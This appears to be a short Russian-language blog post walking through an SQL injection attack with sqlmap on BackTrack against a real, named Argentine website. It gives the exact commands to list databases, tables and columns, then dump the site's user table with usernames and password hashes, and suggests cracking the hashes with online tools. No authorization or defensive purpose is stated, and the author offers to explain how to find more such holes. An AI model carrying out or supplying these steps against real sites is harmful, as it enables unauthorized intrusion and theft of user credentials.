1 запускаем БТ открываем терминал и пишем cd /pentest/web/scanners/sqlmap
2 собственно нам нужно узнать имя БД пишем python sqlmap.py -u http:www.junincc.com.ar/noticia.php?id=1 --dbs смотрим внимательно на строку ниже в терминале databases там написано junincc_junincc вот берем это имя и далее
3 выводим таблицу БД python sqlmap.py -u http:www.junincc.com.ar/noticia.php?id=1 -D junincc_junincc --tables
4 выводим колонки таблицы python sqlmap.py -u http:www.junincc.com.ar/noticia.php?id=1 -D junincc_junincc -T usuarios --columns
5 выводим информацию python sqlmap.py -u http:www.junincc.com.ar/noticia.php?id=1 -D junincc_junincc -T usuarios -C clave,usuario --dump
6 жмем Y ждем
7 через время у вас будет лог и хэшь - расшифровать хешь в онлайне к примеру у меня на вкладке онлаин расшифровщики ) удачи LoRD HG
дополнительно нужно ли рассказывать как найти такую брешь ??
в коменты плиз
Комментариев нет:
Отправить комментарий